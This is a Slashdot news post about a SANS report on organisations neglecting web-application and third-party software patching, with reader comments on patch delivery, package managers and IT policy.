SANS Report Says Organizations Focusing On the Wrong Security Threats 98
yahoi writes "Companies around the world are leaving themselves wide open to Web- and client-side attacks, according to a new report released today by the SANS Institute that includes real attack data gathered from multiple sources. SANS found that most organizations are focusing their patching efforts and vulnerability scanning on the operating system, but they're missing the boat: 60 percent of the total number of attacks occur on Web applications, and many attacks are aimed at third-party applications such as Microsoft Office, and Adobe Flash and other tools. Exacerbating the problem, they're taking twice as long to patch Microsoft Office and other applications than to patch their operating systems."
Can only apply the patches you get (Score:3, Interesting)
SANS found that most organizations are focusing their patching efforts and vulnerability scanning on the operating system, but they're missing the boat
They make it sound as if it's the fault of the client companies. In fact they probably apply all the security patches they get from their suppliers. If most of them come from the O/S vendors and relatively few come from the application vendors - you can hardly blame their cleints.
Maybe SANS should, instead, be asking why application vendors are so tardy about providing fixes for the vulnerabilities that SANS seem to think are the most exploited? Of course, the answer would be that the baddies focus their efforts on the weakest link, which is why more attacks target the (weak) applications than the better supported operating systems.
Re:Most type of exploit is 'other' (Score:3, Interesting)
Yeah, and if they were honest and serious that's were they would have said, "third-party applications can be tough. There are very good systems for patching them, like Debian's APT, but sadly most vendors of proprietary software have made practically no progress in this area in two decades".
Re:OpenBSD vs Linux (Score:3, Interesting)
That's a really great post. It reminds me that any OS which grants their users freedom for their apps to do what they like also grants the freedom for some app running on them to do bad things, whether it effects the OS or not. It will always be like that.
The only solutions I can think of are to 1) create programming languages that result in really secure code through lots of input restrains etc. 2) create a lot of transparency to see what's going on. And even those don't do enough: A language with too much checking will be slow (Java has a much better security name in this department than C for instance) and while seeing if my machine is sending mystery emails out to my friends would be good, what kind of transparency lets me "see" a buffer overflow caused by a Flash movie writing arbitrary code???
Re:Can only apply the patches you get (Score:4, Interesting)
I don't think the problem is lack of application patches being provided, but the lack of them being delivered well.
The problem as I see it is there is no good method of application patch delivery on Windows (And Mac for that matter). On Linux and BSD, you have package managers built into the distro that handles everything from the repositories (either the distro repositories or the application's repositories). On Windows, there is no such thing (Yes, there package managers available, but they are not included stock and aren't widely used) and every application has to handle things itself, either by checking on startup or adding yet another background process taking up resources, both of which are decidedly non-optimal solutions.
In the former, with infrequently used apps (Stuff like Adobe Reader comes to mind), you're going to have infrequent (and thus large) updates, which would result in something like "What? A 15MB update? I don't have time for that, I need to read this PDF." with the obvious consequences or the file being opened before the update option is presented, with the same result.
Re:Too confusing (Score:2, Interesting)
This would have been so much easier to understand with a proper /. car analogy.
Here you go:
It's like locking your car doors and keeping up with the manufacturer recall notices, but ignoring that the remote start system you had installed uses an unencrypted signal.
Re:Most type of exploit is 'other' (Score:3, Interesting)
Business Computers == WindowsXP
I guess we're one of the approximations. ;) Our office is more Ubuntu than Windows and people, astonishing to the Windows faithful, don't have any trouble getting their work done.
Almost any office could replace many, if not most, of their desktops with Ubuntu with very little difficulty. The level of effort increases to another level if you want to try replacing all of them.
Imagine having APT for a large percentage of your desktops. A couple keystrokes to run a script and they're all up to date. Sweet.
Re:OpenBSD vs Linux (Score:3, Interesting)
The default install of PHP can let a user put files in a web site that can compromise or infect the operating system.
Plus, a lot of third party add-ons for PHP want you to add "read/execute" to CMD.exe and put it in the PATH to the PHP services to piggy back their apps into working. Which, is well, stupid.
Maybe on Linux PHP is no harm to the OS, but on MS boxes that is not a safe assumption to make.
Re:Most type of exploit is 'other' (Score:3, Interesting)
The claim that there is no good system is just the sort of claim that gets quoted out of context, and when it happens, supposedly expert technical people will be the ones making the mistakes.
Think of it like politics. Someone writes a story specifically about the Democratic party in Ohio. Five paragraphs in, they say "There are no particularly distinguished front runners for the upcoming election.". What happens when that gets quoted by itself - is there much chance at all that someone will put (for the 2012 Ohio governor's race) after the quote? It seems far more likely that someone will claim the original author said there were no distinguished candidates for the whole democratic party this time around, or misapply it to the presidential election, or maybe someone with different biases will apply it to both major parties nationwide.
Authors, when they are trying to be fact-focused, fair, and rational, frequently go over their manuscripts looking for likely quotes that won't look right if quoted out of context, and insert internal context (In this case it would be something such as 'there's no good system in Windows for patching them'). It's often a mistake to rely on context from outside the immediate quote to keep things clear.
Editors, often take these modifications back out for brevity, but I've known several professional editors who had to deal with the results (i.e. a libel suit over something that wasn't libelous in full context) and have started encouraging such additional context instead.
So you're right - the problem hasn't been solved for Microsoft products. And the parent poster is right - the article is easy to misquote, and that hurts its overall creditability.
Re:The problem is in job responsibility (Score:3, Interesting)
Plus, you eventually end up with a system where all applications have to be approved by the BOFH. Then, when a developer/techie who knows what he's doing needs to use a new tool to solve a problem it ends up in a 6-month queue for "approval".
What actually happens is that the user complains to Heap Big Boss (board-level or equivalent) and they instruct the poor BOFH to approve their pet project immediately or find another job. It's a really bad idea to be the person who says "no" to another person doing their job, especially if they have the ear of higher up (and most users will only deliberately use a new app if it is something dictated from on high; the rest of the time they'll cling to old stuff far more than a BOFH would).
Re:OpenBSD vs Linux (Score:2, Interesting)